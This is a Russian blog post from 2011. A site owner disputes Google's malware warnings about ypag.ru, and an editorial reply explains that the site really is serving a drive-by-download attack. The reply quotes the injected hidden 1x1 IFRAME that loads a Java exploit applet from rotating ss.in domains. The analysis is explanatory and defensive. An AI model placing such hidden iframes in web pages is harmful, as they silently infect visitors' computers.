Раз в 3 дня антивирус Google сообщает что на портале YPAG.RU обнаружено вредоносное ПО. При проверке, нашими администраторами естественно ни чего ни обнаруживается. Дается заявка на пересмотр. Сутки длится пересмотр. Блокировка снимается, а через неделю все по новой.
Из последних шедевров:
13.09.2011 Уважаемый владелец или веб-мастер сайта http://ypag.ru/! Недавно мы обнаружили, что посещение определенных страниц Вашего сайта может привести к заражению компьютеров пользователей вредоносными программами. Теперь пользователям, переходящим на эти страницы по ссылкам в результатах поиска Google.ru, отображается страница с предупреждением. Ниже мы приводим один или несколько примеров URL страниц Вашего сайта, которые могут привести к заражению компьютеров пользователей: http://www.ypag.ru/cat/l207/page300.html
http://www.ypag.ru/cat/pred30/page0.html
http://www.ypag.ru/cat/komp489/page0.html
Ссылка на типовую страницу с предупреждением: http://www.google.com/interstitial?url=http://www.ypag.ru/cat/l207/page300.html Мы настоятельно рекомендуем незамедлительно заняться исследованием этой проблемы и обеспечить безопасность посетителей. На некоторых сайтах вредоносное ПО распространяется владельцами умышленно, однако во многих случаях веб-мастера не знают о факте распространения нежелательных программ.
Для примера проверка Dr Web http://online.us.drweb.com/cache/?i=615c7097d836798f7b0fdcfd976b3d05
Если есть тут представители Google, передайте своим разработчикам антивируса, пусть они его успокоят, а еще лучше отключат. Таких как мы ни один. Много жалоб на ваш антивирус http://www.google.com/support/forum/p/webmasters/label?lid=7febfdbbfed5375b&hl=ru
Для оперативного решения проблемы свяжитесь со мной bilozor_sergey@mail.ru
С уважением директор портала YPAG.RU
Билозор Сергей Денисович
---------
От редакции: стоит отметить, что Билозор далеко не единственный, кто столкнулся с такой проблемой - http://idiot.fm/2011/09/14/po-situacii-s-preduprezhdeniem-gugla/
Google совершенно правильно считает сайт ypag.ru заражённым. Потому что ypag.ru регулярно начинает распространять вредоносное ПО, потом перестаёт, потом опять начинает. Позавчера, например, в опять начал, а сегодня перестал. В общих чертах, вредоносный код с ypag.ru работает так. В браузер, например, со страницы h**p://www.ypag.ru/cat/komp550/page0.html загружается IFRAME src=»h**p://b4ss.in/stat/show.php?key=fcfe7c&u=root» frameBorder=0 width=1 height=1></IFRAME Он подгружает c b4ss.in апплет, эксплуатирующий уязвимости Java, и заражающий систему. На самом деле, не обязательно c b4ss.in, просто с домена [буква][цифра]ss.in . Недавно, например, в качестве источника использовался домен b3ss.in. Так что не на антивирус Google ругаться надо, Сергей Денисович, а вредоносный код с ypag.ru удалить и больше туда не допускать. Что же до антивирусов, то любой антивирус время от времени ошибается, особенно когда нужно выявить drive-by-download атаку с сайта. Лучше дополнять его браузером, который умеет предупреждать о заражённых сайтах через SB API. Мы вот в Яндексе пользуемся своей сборкой Firefox, потому что он настроен на наш SB API, который знает русских заражённых сайтов больше, чем стандартный, да они и перепроверяются у нас чаще.